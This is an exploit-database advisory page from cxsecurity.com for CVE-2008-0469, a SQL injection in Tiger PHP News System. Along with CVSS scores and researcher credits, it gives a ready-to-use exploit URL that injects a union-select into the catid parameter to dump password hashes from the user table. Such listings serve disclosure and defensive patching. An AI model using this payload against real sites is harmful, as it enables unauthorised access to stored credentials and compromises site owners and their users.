Exploit: Tiger PHP News System SQL Injection ( Ascii Version )

Search:
WLB2

Tiger PHP News System SQL Injection

Published
Credit
Risk
2008.01.29
0in
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2008-0469
No
Yes

Plain text version

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

/*

*Tiger PHP News System SQL Injection

*Bug found bY 0in from DaRk-Coders Group!

*Homepage: http://dark-coders.4rh.eu or http://dark-coders.prv.pl

*IRC:#dark-coders at irc.freenode.org

*Email: 0in(dot)email(at)gmail(dot)com

*/

Script home: http://tpns.k-na.se/

Exploit: http://localhost/?page=newscat&catid=-666%20union%20select%20passwd%20fr
om%20user

Greetings to:All Dark-Coders Team Members - Die-Angel,m4r1usz,suN8Hclf,Djlinux,

Aristo89

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version